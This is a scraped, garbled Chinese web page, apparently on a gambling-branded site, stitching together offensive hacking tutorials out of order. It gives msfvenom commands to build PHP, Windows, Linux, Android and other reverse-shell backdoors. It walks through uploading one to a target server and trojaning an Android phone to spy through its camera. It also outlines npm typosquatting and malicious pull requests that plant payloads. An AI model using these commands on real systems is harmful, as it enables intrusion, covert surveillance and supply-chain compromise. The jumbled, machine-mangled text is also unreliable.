www.tengbo9887.com,腾博游戏|官网
互联网
您所在的位置是:www.tengbo9887.com > 互联网 >
互联网
您所在的位置是:www.tengbo9887.com > 互联网 >

互联网

metasploit框架PHP反向后门建立教程

发布时间:2019-12-25 00:19    浏览次数 :

还未完呢,卓越还在背后。

编码次数。

msfvenom -l  查看全体payload

 

图片 1

Executable formats:

metasploit框架PHP反向后门创设

3.show options 查看参数设置

cat index.js

3.    –f (- -help-formats)

Metasploit简介

MSF是Metasploit的简单的称呼,Metasploit是意气风发款开源的安全漏洞检查评定工具,极度常有力,分别有Windows版和Linux版,工具里集成了不少微软颁发的尾巴(0day卡塔尔国。

啊!界面突显 compile successful!很圆满的二次编写翻译!你感到是时候显得实在的技能了!

生成payload的最大尺寸,便是文件大小。

Framework Payloads (436 total)

    Name                                                Description
    ----                                                -----------
    aix/ppc/shell_bind_tcp                              Listen for a connection and spawn a command shell
    aix/ppc/shell_find_port                             Spawn a shell on an established connection
    aix/ppc/shell_interact                              Simply execve /bin/sh (for inetd programs)
    aix/ppc/shell_reverse_tcp                           Connect back to attacker and spawn a command shell
此外的简便。
那边要选取的是PHP反向后门
msfvenom -p php/meterpreter/reverse_tcp --payload-options  查看参数
Options for payload/php/meterpreter/reverse_tcp:

       Name: PHP Meterpreter, PHP Reverse TCP Stager
     Module: payload/php/meterpreter/reverse_tcp
   Platform: PHP
       Arch: php
Needs Admin: No
 Total size: 936
       Rank: Normal
Provided by:
    egypt <egypt@metasploit.com>
Basic options:
Name   Current Setting  Required  Description
----   ---------------  --------  -----------
LHOST                   yes       The listen address
LPORT  4444             yes       The listen port
Description:
  Run a meterpreter server in PHP. Reverse PHP connect back stager
  with checks for disabled functions
 
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=1234 -f raw >c.php 生成脚本
转移后要将脚本最前边的注释符去掉,然后上传到目的服务器上
启动msf
use exploit/multi/handler
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 192.168.1.2
set LPORT 1234
exploit 运维监听
 
下一场从浏览器中开拓上传的台本http://xxx.com/c.php
msf中就走访到
*] Starting the payload handler...
[*] Sending stage (33068 bytes) to XXX.XXX.XXX.XXX
[*] Meterpreter session 1 opened (192.168.1.2:1234 -> xxx.xxx.xxx.xxx:42280) at
meterpreter >
 
豆蔻年华旦kali安装在虚构机上,需求桥接,然后路由器上将kali DMZ到外网

瞩目:此教程只用于学习使用别的一切结果与本站无前

输入指令:msfconsole

图片 2

MSFVENOM实例

12.         普通生成

  1. msfvenom -p <payload> <payload options> -f <format> -o <path>

  2. msfvenom –p windows/meterpreter/reverse_tcp –f exe –o C:back.exe

13.         编码管理型

  1. msfvenom -p <payload> -e <encoder > -i <encoder times> -n <nopsled> -f <format> -o <path>

  2. msfvenom –p windows/meterpreter/reverse_tcp –i 3 –e x86/shikata_ga_nai –f exe –o C:back.exe

14.         捆绑

  1. Msfvenom –p windows/meterpreter/reverse_tcp –platform windows –a x86 –x C:nomal.exe –k –f exe –o C:shell.exe

15.         Windows

  1. Msfvenom –platform windows –a x86 –p windows/meterpreter/reverse_tcp –i 3 –e x86/shikata_ga_nai –f exe –o C:back.exe

  2. Msfvenom –platform windows –a x86 –p windows/x64/meterpreter/reverse_tcp –f exe –o C:back.exe

16.         Linux

  1. msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf

17.         MAC

  1. msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho

18.         PHP

  1. msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php

19.         Asp

  1. msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp

20.         Aspx

  1. msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f aspx > shell.aspx

21.         JSP

  1. msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp

22.         War

  1. msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war

23.         Bash

  1. msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On>-f raw > shell.sh

24.         Perl

  1. msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl

25.         Python

  1. msfvenom -p python/meterpreter/reverser_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py

 

 

转载:http://www.srcbug.com/2017/05/05/msfvenom%E5%AD%A6%E4%B9%A0%E6%80%BB%E7%BB%93/

灰帽黑客(第3版卡塔尔(قطر‎Metasploit是八个免费的、可下载的框架,通过它能够十分轻便地获取、开辟并对应用程式漏洞施行攻击。它本身附带数百个已知软件漏洞的专门的学问级漏洞攻击工具。当H.D. Moore在二零零三年颁发Metasploit时,Computer安全处境也被永恒性地改成了。仿佛豆蔻梢头夜之间,任何人都能够成为黑客,各类人都得以运用攻击工具来抨击那一个未打过补丁恐怕刚刚打过补丁的尾巴。软件厂商再也不能够推迟公布针对已宣布漏洞的补丁了,那是因为Metasploit团队一向都在忙乎付出种种攻击工具,并将它们进献给具有Metasploit客商

还应该有社工什么等等的,这里笔者就大约的把木Marvin件弄笔者要好的手机上做测量检验

一个 npm 包被冒充不是主题材料,多少个黑心的 P福睿斯被不出名的门类 Approve 亦不是主题素材。就疑似三个伸手不能够叫攻击,但是几百万的号令打过来的时候,你就通晓DDOS 有多可怕。

x86 | x64 | x86_64

 webcam_snap 隐私拍照效用

然后下了一群你都不亮堂从哪个地方来的 npm 包。

2.    –l

既然是侵犯安卓手提式无线电话机,确定要先配备贰个安卓木马,那我们看看本机的IP 

  1. debug
  2. qs
  3. yargs
  4. request
  5. chalk
  6. form-data
  7. cheerio
  8. gulp
  9. browserify
  10. bower
  11. mongoose
  12. electron
  13. normalize.css
  14. mysql

载荷这么些东西超多,那些软件就是依赖对应的载重payload生成对应平台下的后门,所以独有选对payload,再填写精确本身的IP,PORT就足以变动对应语言,对应平台的后门了!!!

 

那会儿,小白鼠跑了 koa_multer 里的 demo 代码!

4.    –e

自家那边做测量检验的系统是Backbox linux ,那是生龙活虎款互连网渗透,音讯安全评估系列。里边安装了巨额的工具。此中MSF就自带有。当然还或然有其余的 举例Kali linux 、Back Track那么些等等。

那会儿,在网线的另一只,三个黑客微微一笑:又有八个肉鸡上线了。

(- -payload-options 列出payload选项)

webcam_list查看手提式有线电电话机油画头有多少个 这里显得两项 分别表示有前后七个摄像头

利用 handler 模块。并在 handler 模块中安装 payload ,攻击主机 IP,攻击主机端口,并运行监听:

9.    –i

对象:大器晚成台安卓手提式有线电话机

2. https://github.com/ChALkeR/notes/blob/master/Gathering-weak-npm-credentials.md[返回搜狐,查看更多](http://www.sohu.com/?strategyid=00001%20)

制止使用的字符 举例:不行使 ‘f’。

设置到位后 会在桌面上生成一个MainActivity的程序图标那些正是我们刚刚生成的木马 当我们点击了这些Logo 手机缘未有任何反应 其实木马已经起先运营起来了

黑客那边,即刻能获取那么些 shell 的对话:

(- -help-formats 列出装有文件格式卡塔尔国

3.exploit 伊始实行漏洞 发轫监听...

获得 shell 真的可认为所欲为,只有你意外,未有黑客做不到。

Transform formats:

图片 3

前端技术员的另一个口头禅是何等?npm run dev!

翻看全体payload encoder nops。

接下来输入:

隐藏 payload

捆绑。举个例子:原先有个不荒谬文件normal.exe 能够经过这么些选项把后门捆绑到那个程序方面。

2.set LPORT 5555 这里的端口设置成刚才咱们生成木马所监听的端口

Done?

文件输出。

此外的成效还会有更加多 。权且就先到那吗。。。

本人帮你修复了难题 XXX,还抬高了五颜六色 logger 的机能!

8.    –b

本机IP:192.168.1.6

msfvenom -l | grep node

10.         –c

还足以输入指令 webcam_stream 开启拍录头 

图片 4

7.    –s

OK,一切计划干活思量稳当。。。今后要做的就是把木Marvin件搞到居家的无绳电话机上,思路有超多能够DNS arp威胁棍骗 只要对方用手提式有线电话机下载文件 就能下载我们的木Marvin件

红客完全能够把下载 npm 包,虚构代码并公布这段逻辑自动化。之后,就不止是 koa_multer 的题目了,你须求防备 koa-multe,multer-koa,koa-multer-middleware 等等各类奇奇异怪的 npm 包,还要区分"_"和"-"的不相同,当然,也不只是 koa-multer 那么些包,别的兼具的包都可以依样画葫芦。

出口文件格式。

 

混淆

11.         –x | -k

图片 5

那儿警觉的前端程序猿会跳出来怼作者:你这包意气风发看就驾驭是骗人的,小编鲜明不会蠢到安装这种包!

6.    –o

诸有此类对方的无绳电电话机就就被大家决定了,查看手提式有线话机系统音信,输入指令 sysinfo

另多少个思路是,做二个通用的 npm 包,例如能 log 出多彩颜色的包,然后去给别的的开源项目提 P本田UR-V:

1.    –p (- -payload-options)

在到极点输入指令:msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=5555 R > /root/apk.apk

以此命令从 npm 酒店中下载一批从品种 package.json 中声明的注重性,下载完信赖后,再下载信任中 package.json 表明的依据,下载完信任的信任后,再下载重视中 package.json 评释的正视中的 package.json 注解的正视,下载完信任后…………

编码免杀。

图片 6

图片 7

筛选结构平台

 

正规的思路是,做一个和健康 npm 包名字很像的包名,举个例子 koa-multer,能够做一个koa_multer,然后总有局地人会打错字,下载到包涵 payload 的包。那是一个概率难点,下载 koa-multer 的总的数量越大,下载 koa_multer 的量也越大。

asp, aspx, aspx-exe, axis2, dll, elf, elf-so, exe, exe-only, exe-service, exe-small, hta-psh, jar, loop-vbs, macho, msi, msi-nouac, osx-app, psh, psh-net, psh-reflection, psh-cmd, vba, vba-exe, vba-psh, vbs, war

图片 8

红客那边,须求预备好 handler。

bash, c, csharp, dw, dword, hex, java, js_be, js_le, num, perl, pl, powershell, ps1, py, python, raw, rb, ruby, sh, vbapplication, vbscript

2. set payload android/meterpreter/reverse_tcp  选择Payload